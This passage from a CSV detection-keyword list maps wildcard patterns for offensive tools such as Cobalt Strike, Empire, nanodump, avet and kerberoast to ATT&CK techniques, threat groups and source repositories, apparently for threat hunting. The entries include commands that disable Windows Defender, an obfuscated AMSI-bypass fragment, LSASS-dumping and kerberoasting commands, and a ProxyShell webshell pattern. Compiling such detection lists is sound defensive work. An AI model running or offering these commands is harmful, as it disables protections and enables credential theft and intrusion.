TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*set_logon_script.py*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" +"*set_objectpipe \\*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*set_payload_execution_method exec_shellcode64*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*set_payload_execution_method inject_dll*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*set_payload_info_source from_command_line_raw*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*set_payload_source download_powershell*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*set_rpc_callstack*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*set_shellcode","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"*set_svchost_callstack*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*set_wmi_callstack*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*set_wmiconfig \*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*setc_webshell*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" +"*Set-DCShadowPermissions*","offensive_tool_keyword","AD exploitation cheat sheet","DCShadow is an attack that masks certain actions by temporarily imitating a Domain Controller. If you have Domain Admin or Enterprise Admin privileges in a root domain it can be used for forest-level persistence.","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Set-DCShadowPermissions*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Set-DesktopACLToAllow*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Set-DomainObject*","offensive_tool_keyword","AD exploitation cheat sheet","Targeted kerberoasting by setting SPN","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Seth by SySS GmbH*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" +"*seth.py * -j INJECT*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" +"*Seth-master.zip*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","1","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" +"*sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx'*","offensive_tool_keyword","AD exploitation cheat sheet","PowerShell AMSI Bypass Obfuscation example for copy-paste purposes","T1548 T1562 T1027","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Set-ItemProperty *\excel\security*pythonfunctionwarnings*0*","greyware_tool_keyword","Excel","prevent any warnings or alerts when Python functions are about to be executed. Threat actors could run malicious code through the new + Microsoft Excel feature that allows Python to run within the spreadsheet","T1112 - T1131 - T1204.002","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tsale/Sigma_rules/blob/main/MISC/pythonfunctionwarnings_disabled.yml","1","0","N/A","7","1","88","10","2023-09-13T20:39:02Z","2022-01-11T07:34:37Z" +"*set-killdate *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Set-Killdate*","offensive_tool_keyword","empire","empire function name of agent.ps1. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1049","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*setLoaderFlagZero*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*Set-MacAttribute.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1088","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Set-MpPreference -DisableIOAVProtection $true*","greyware_tool_keyword","powershell","Disable scanning all downloaded files and attachments","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" +"*Set-MpPreference -DisableRealtimeMonitoring $true*","greyware_tool_keyword","powershell","Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. disable Microsoft firewall and clear logs.","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" +"*Set-MpPreference -DisableRealtimeMonitoring *true*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Set-MpPreference -DisableScriptScanning 1 *","greyware_tool_keyword","powershell","Disable AMSI (set to 0 to enable)","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" +"*Set-OabVirtualDirectory -ExternalUrl 'http*://*function Page_Load(){*}*","offensive_tool_keyword","ProxyShell","Microsoft Exchange Servers exploits - ProxyLogon and ProxyShell CVE-2021-27065 CVE-2021-34473 CVE-2021-34523 CVE-2021-31207","T1210.003 - T1190 - T1059.003 - T1059.001 - T1059.005 - T1505","TA0001 - TA0002 - TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation Tools","https://www.cert.ssi.gouv.fr/uploads/ANSSI_TLPWHITE_ProxyShell_ProxyLogon_Sigma_yml.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*setoolkit *","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","9395","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" +"*SetProcessInjection*encryptor.py*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*SetProcessInjection-main*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*set-pushover-applicationtoken*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*set-pushover-userkeys*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Set-RemotePSRemoting*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Set-RemoteWMI.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Set-ServiceBinPath*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*setspn -A HTTP/*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" +"*setspn -T medin -Q */*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" +"*setspn.exe -T medin -Q */*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" +"*setthreadcontext.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*setthreadcontext.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*Setting up GFlags & SilentProcessExit settings in registry?*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*setuid_setgid.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*setup_apfell.sh*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*setup_obfuscate_xor_key*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 